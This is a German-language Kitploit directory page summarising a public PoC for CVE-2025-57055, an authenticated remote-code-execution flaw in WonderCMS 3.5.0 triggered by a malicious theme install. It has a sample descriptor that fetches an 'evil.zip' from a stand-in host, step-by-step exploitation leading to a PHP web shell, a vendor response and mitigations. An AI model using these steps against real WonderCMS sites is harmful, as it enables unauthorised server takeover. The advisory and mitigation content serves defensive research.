Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-57055 — Authentifizierter RCE-Exploit für WonderCMS 3.5.0 durch bösartige Theme-Installation. Enthält Schwachstellenmechanismen, PoC und Minderungsanleitung für Sicherheitstests und Schulung. | Kitploit
Tools/GitHubGitHub/thawphone/cve-2025-57055
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubthawphone/cve-2025-57055

CVE-2025-57055

Authentifizierter RCE-Exploit für WonderCMS 3.5.0 durch bösartige Theme-Installation. Enthält Schwachstellenmechanismen, PoC und Minderungsanleitung für Sicherheitstests und Schulung.

Repository anzeigen
vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-57055: Authentifizierte Remote-Code-Ausführung in WonderCMS 3.5.0

Angriffsmechanik

In WonderCMS v3.5.0 existiert eine authentifizierte Remote-Code-Ausführungs-Schwachstelle (RCE).

Das Problem liegt in der Art und Weise, wie die Anwendung Remote-Theme/Modul-Installationen über JSON-Deskriptoren handhabt. Wenn ein Administrator eine entfernte JSON-Datei mit Verweis auf ein ZIP-Archiv einreicht, werden deren Inhalte in ein webbasiertes Verzeichnis extrahiert (z. B. /themes/). Enthält das ZIP eine PHP-Datei, wird diese Datei über das Web zugänglich und kann ausgeführt werden.

Dieses Verhalten birgt ein RCE-Risiko aufgrund von:

  • Fehlender Validierung oder Bereinigung von ZIP-Inhalten.
  • Keiner Einschränkung der Dateitypen, die aus entfernten Quellen extrahiert werden.
  • Web-Zugänglichkeit der Theme/Plugin-Verzeichnisse.

Hinweis: Eine Administrator-Authentifizierung ist erforderlich, aber Standardinstallationen legen das Admin-Passwort öffentlich auf der Startseite offen, verwenden eine reine Passwort-Anmeldung und erzwingen keine strengen Authentifizierungskontrollen.

Akzeptanzkriterien für Remote-Modul/Theme-Deskriptoren

WonderCMS akzeptiert und versucht, Remote-Module/Themes zu installieren, wenn der eingereichte JSON-Deskriptor dem erwarteten wcms-modules.json-Format entspricht. Ein Deskriptor, der die Formatauswertung besteht (und auf ein ZIP-Archiv verweist), wird abgerufen und seine Archivinhalte werden ohne weitere Validierung der Dateitypen in ein webbasiertes Verzeichnis extrahiert (z. B. /themes/<name>/).

Beispiel-Deskriptor:

root@kitploit:~
{
  "themes": {
    "SSRF": {
      "name": "FAKE",
      "repo": "https://example.com/",
      "zip": "https://example.com/evil.zip",
      "summary": "test",
      "version": "1.0.0",
      "image": "https://example.com/fake.png"
    }
  }
}

Proof of Concept (PoC)

Warnung: Nicht auf Produktionssystemen ausführen. Nur autorisierte Testumgebungen verwenden.

  1. Besorgen Sie sich das Admin-Passwort von der öffentlich zugänglichen Startseite einer standardmäßigen WonderCMS-Installation.

  2. Melden Sie sich im Admin-Panel an.

  3. Navigieren Sie zum Theme-Installationsbereich.

  4. Geben Sie die URL zu einem schädlichen JSON-Deskriptor an (z. B. gehostet auf einem Angreifer-kontrollierten Server).

  5. Starten Sie die Installation. Der Server wird:

  • Den Deskriptor abrufen.
  • Das angegebene ZIP-Archiv herunterladen.
  1. Installieren Sie das heruntergeladene schädliche Theme.

  2. Greifen Sie auf die extrahierte PHP-Shell zu (z. B. http://target.com/themes/<Theme_Name>/shell.php), um beliebige Befehle auszuführen.

(Hinweis: Führen Sie diese Schritte nur in einer kontrollierten Testumgebung durch. Das Ausnutzen dieser Schwachstelle in Live-Systemen ohne Autorisierung ist illegal.)

Reaktion des Herstellers

  • Die Schwachstelle wurde den WonderCMS-Maintainern im Juli 2025 gemeldet.

  • Die Maintainer bestätigten den Bericht, merkten jedoch an, dass dieses Verhalten aus ihrer Sicht für Administratoren akzeptabel sei.

Abhilfemaßnahmen

Um die Gefährdung zu reduzieren:

  • Schränken Sie die Remote-Installationsmöglichkeiten auf vertrauenswürdige Quellen ein (z. B. nur GitHub).
  • Validieren und bereinigen Sie ZIP-Inhalte vor dem Extrahieren.
  • Härten Sie die Authentifizierung:
    • Verstecken Sie das Admin-Passwort nach der Installation.
    • Erzwingen Sie die Anmeldung mit Benutzername/Passwort.
    • Aktivieren Sie die Multi-Faktor-Authentifizierung (falls verfügbar).
  • Verhindern Sie den Zugriff auf ausführbare Dateien in themes/ oder plugins/ durch Serverkonfiguration.

Referenzen

  • WonderCMS GitHub
  • OWASP A05:2021 – Sicherheitsfehlkonfiguration
  • CWE-434 – Uneingeschränktes Hochladen von Dateien mit gefährlichem Typ

Haftungsausschluss

Diese Informationen werden zu Zwecken der defensiven Sicherheitsforschung und zu Bildungszwecken bereitgestellt. Holen Sie vor dem Testen oder Offenlegen von Schwachstellen stets die entsprechende Genehmigung ein.

Tool herunterladen